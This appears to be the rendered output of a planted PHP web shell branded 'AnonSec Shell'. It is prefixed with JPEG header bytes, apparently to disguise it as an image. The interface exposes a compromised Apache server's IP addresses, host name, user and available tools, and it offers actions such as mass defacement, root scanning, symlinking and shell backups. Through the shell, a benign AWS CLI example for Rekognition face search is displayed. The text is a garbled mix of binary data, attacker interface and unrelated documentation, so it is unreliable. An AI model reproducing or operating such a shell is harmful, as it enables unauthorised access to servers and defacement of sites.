JFIF  H H C nxxd C "     &    !1A2Q"aqBb    1   ? R{~ ,.Y| @sl_޸s[+6ϵG};?2Y`&9LP ?3rj  "@V]:3T -G*P ( *(@AEY]qqqALn +Wtu?)l QU T* Aj- x:˸T u53Vh @PS@ ,i,!"\hPw+E@ ηnu ڶh% (Lvũbb- ?M֍݌٥IHln㏷L(6 9L^"6P  d&1H&8@TUT CJ%eʹFTj4i5=0g J &Wc+3kU@PS@HH33M * "Uc(\`F+b{RxWGk ^#Uj*v' V ,FYKɠMckZٸ]ePP  d\A2glo=WL(6 ^;k"ucoH"b ,PDVlvL_/:̗rN\m dcw T-O$w+FZ5T *Y~l: 99U)8ZAt@GLX*@bijqW;MᎹ،O[5*5*@=qusݝ *EPx՝.~ YИ 3M3@E)GTg%Anp P MUҀhԳW c֦iZ ffR 7qMcyAZT c0bZU k+oG<] APQ T A={PDti@c>>KÚ"q L.1P k6QY7t.k7o  <P &yַܼJZy Wz{UrS @ ~P)Y:A"]Y&ScVO%17 6l4 i4YR5 ruk* ؼdZͨZZ cLakb3N6æ\1`XTloTuT AA 7Uq@2ŬzoʼnБRͪ&8}: e}0ZNΖJ*Ս9˪ޘtao]7$ 9EjS} qt" ( .=Y:V#'H: δ4#6yjѥBB ;WD-ElFf67*\AmAD Q __'2$ TX 9nu'm@iPDT qS`%u%3[nY,  :g = tiX H]ij"+6Z* .~|05s6 ,ǡ ogm+ KtE-BF  ES@(UJ xM~8%g/= Vw[Vh 3lJT  rK -kˎY ٰ  ,ukͱٵf sXDP  ]p]&MS95O+j &f6m463@ t8ЕX=6}HR 5ٶ06 /@嚵*6  " hP@eVDiYQT `7tLf4c?m//B4 laj  L} :E  b#PHQb, yN`rkAb^ |} s4XB4 * ,@[{Ru+%le2} `,kI$U` >OMuh  P % ʵ/ L\5aɕVN1R6 3}ZLj-Dl@ *( K\^i@F@551 k㫖h  Q沬#h XV +;]6z OsFpiX $OQ ) ųl4 YtK'(W AnonSec Shell
AnonSec Shell
Server IP : 52.223.31.75  /  Your IP : 172.31.44.28   [ Reverse IP ]
Web Server : Apache/2.4.67 () OpenSSL/1.0.2k-fips PHP/7.4.33
System : Linux ip-172-31-14-184.eu-central-1.compute.internal 4.14.281-212.502.amzn2.x86_64 #1 SMP Thu May 26 09:52:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 7.4.33
Disable Function : NONE
Domains : 4 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /usr/lib/python2.7/site-packages/awscli/examples/rekognition/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /usr/lib/python2.7/site-packages/awscli/examples/rekognition/search-faces.rst
**To search for faces in a collection that match a face ID.**

The following ``search-faces`` command searches for faces in a collection that match the specified face ID. ::

    aws rekognition search-faces \
        --face-id 8d3cfc70-4ba8-4b36-9644-90fba29c2dac \
        --collection-id MyCollection

Output::

    {
        "SearchedFaceId": "8d3cfc70-4ba8-4b36-9644-90fba29c2dac", 
        "FaceModelVersion": "3.0", 
        "FaceMatches": [
            {
                "Face": {
                    "BoundingBox": {
                        "Width": 0.48166701197624207, 
                        "Top": 0.20999999344348907, 
                        "Left": 0.21250000596046448, 
                        "Height": 0.36125001311302185
                    }, 
                    "FaceId": "bd4ceb4d-9acc-4ab7-8ef8-1c2d2ba0a66a", 
                    "ExternalImageId": "image1.jpg", 
                    "Confidence": 99.99949645996094, 
                    "ImageId": "5e1a7588-e5a0-5ee3-bd00-c642518dfe3a"
                }, 
                "Similarity": 99.30997467041016
            }, 
            {
                "Face": {
                    "BoundingBox": {
                        "Width": 0.18562500178813934, 
                        "Top": 0.1618019938468933, 
                        "Left": 0.5575000047683716, 
                        "Height": 0.24770599603652954
                    }, 
                    "FaceId": "ce7ed422-2132-4a11-ab14-06c5c410f29f", 
                    "ExternalImageId": "example-image.jpg", 
                    "Confidence": 99.99340057373047, 
                    "ImageId": "8d67061e-90d2-598f-9fbd-29c8497039c0"
                }, 
                "Similarity": 99.24862670898438
            }, 
            {
                "Face": {
                    "BoundingBox": {
                        "Width": 0.18562500178813934, 
                        "Top": 0.1618019938468933, 
                        "Left": 0.5575000047683716, 
                        "Height": 0.24770599603652954
                    }, 
                    "FaceId": "13692fe4-990a-4679-b14a-5ac23d135eab", 
                    "ExternalImageId": "image3.jpg", 
                    "Confidence": 99.99340057373047, 
                    "ImageId": "8df18239-9ad1-5acd-a46a-6581ff98f51b"
                }, 
                "Similarity": 99.24862670898438
            }, 
            {
                "Face": {
                    "BoundingBox": {
                        "Width": 0.5349419713020325, 
                        "Top": 0.29124999046325684, 
                        "Left": 0.16389399766921997, 
                        "Height": 0.40187498927116394
                    }, 
                    "FaceId": "745f7509-b1fa-44e0-8b95-367b1359638a", 
                    "ExternalImageId": "image9.jpg", 
                    "Confidence": 99.99979400634766, 
                    "ImageId": "67a34327-48d1-5179-b042-01e52ccfeada"
                }, 
                "Similarity": 96.73158264160156
            }, 
            {
                "Face": {
                    "BoundingBox": {
                        "Width": 0.5307819843292236, 
                        "Top": 0.2862499952316284, 
                        "Left": 0.1564060002565384, 
                        "Height": 0.3987500071525574
                    }, 
                    "FaceId": "2eb5f3fd-e2a9-4b1c-a89f-afa0a518fe06", 
                    "ExternalImageId": "image10.jpg", 
                    "Confidence": 99.99970245361328, 
                    "ImageId": "3c314792-197d-528d-bbb6-798ed012c150"
                }, 
                "Similarity": 96.48291015625
            }, 
            {
                "Face": {
                    "BoundingBox": {
                        "Width": 0.5074880123138428, 
                        "Top": 0.3774999976158142, 
                        "Left": 0.18302799761295319, 
                        "Height": 0.3812499940395355
                    }, 
                    "FaceId": "086261e8-6deb-4bc0-ac73-ab22323cc38d", 
                    "ExternalImageId": "image6.jpg", 
                    "Confidence": 99.99930572509766, 
                    "ImageId": "ae1593b0-a8f6-5e24-a306-abf529e276fa"
                }, 
                "Similarity": 96.43287658691406
            }, 
            {
                "Face": {
                    "BoundingBox": {
                        "Width": 0.5574039816856384, 
                        "Top": 0.37187498807907104, 
                        "Left": 0.14559100568294525, 
                        "Height": 0.4181250035762787
                    }, 
                    "FaceId": "11c4bd3c-19c5-4eb8-aecc-24feb93a26e1", 
                    "ExternalImageId": "image5.jpg", 
                    "Confidence": 99.99960327148438, 
                    "ImageId": "80739b4d-883f-5b78-97cf-5124038e26b9"
                }, 
                "Similarity": 95.25305938720703
            }, 
            {
                "Face": {
                    "BoundingBox": {
                        "Width": 0.5773710012435913, 
                        "Top": 0.34437501430511475, 
                        "Left": 0.12396000325679779, 
                        "Height": 0.4337500035762787
                    }, 
                    "FaceId": "57189455-42b0-4839-a86c-abda48b13174", 
                    "ExternalImageId": "image8.jpg", 
                    "Confidence": 100.0, 
                    "ImageId": "0aff2f37-e7a2-5dbc-a3a3-4ef6ec18eaa0"
                }, 
                "Similarity": 95.22837829589844
            }
        ]
    }

For more information, see `Searching for a Face Using Its Face ID <https://docs.aws.amazon.com/rekognition/latest/dg/search-face-with-id-procedure.html>`__ in the *Amazon Rekognition Developer Guide*.

Anon7 - 2022
AnonSec Team